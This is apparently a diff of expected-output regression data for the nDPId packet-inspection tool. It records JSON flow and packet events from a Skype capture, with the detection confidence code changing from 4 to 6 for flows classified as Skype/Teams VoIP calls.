00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1431969669408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969669408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA749YAAEARS6HAqAEi1cezqDLdnEYAJ90VnCwCpNRKktf4Qi\/bdq+yPcZvRHBM0A5YqXcB1iPXfA=="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":804,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1431969669408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969669408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5xgUAAEARIZrAqAEinTg0EjLdgQkAJZdLnC4CEFtjW45ZN3BY7kxO5IarNwXkC3qnvdRTMpg="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":804,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":804,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1431969669408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969669408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9eQsAAEARtnjAqAEi1cezmjLdnGIAKUaUnDACIJVxUOV7zs6xYvMq6EYi6E1yxVZ+ttOndiNbBj7C"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":815,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1431969670418,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969670418,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1a3EAAEARxCLAqAEi1cezkjLdnF4AIe2\/nDICH70PgbauE\/TDe2jJ8Wqi40Tw\/dlcGg=="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":815,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":815,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":816,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1431969670418,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969670418,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4XYMAAEARoWrAqAEib91KIDLdnEkAJPvTnDQCE7A5vpizco713fAfzrDXfyhKHUClX6xRMw=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":816,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":816,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1431969671427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969671427,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7f50AAEAR4bnAqAEiQAQXjTLdnEQAJ4UFnDYCwyd8EHi1QBLXs1KZU1iJVh3lwESpNueb3tiaIg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":825,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1431969671427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969671427,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8ovIAAEAR9aDAqAEiQTffHDLdnFoAKLy9nDgCw\/trQW+yBgre1M\/iGb+xrR1ukS\/k6lR8WrcUGNw="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":825,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":825,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":826,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1431969671427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969671427,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3g4AAEARUfvAqAEinTfroTLdnEsALJxsnDoCIAhyfiAhHAGT2pPsDhuBxLXCl+D8eTQt2\/ZTx9MpLSju"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":836,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1431969672489,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969672489,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NOAAAEARZEfAqAEinTeCkDLdnGIAINainDwChxJXV87XhkbitLg+A\/cA051ANFNY"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":836,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":836,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1431969672489,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969672489,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2EcMAAEAR7TnAqAEib91KEzLdnEEAItfhnD4Cb3aeHJFamREFARmu+jDLOabt8VoC3Pk="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABAbK1AAEAGNnfAqAEinTc4ksOFnF5LaK4QAAAAALAC\/\/8DvAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -463,13 +463,13 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3dtAAEAG4QXAqAEib91KL8OHnF60mgT1AAAAALAC\/\/9fYAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 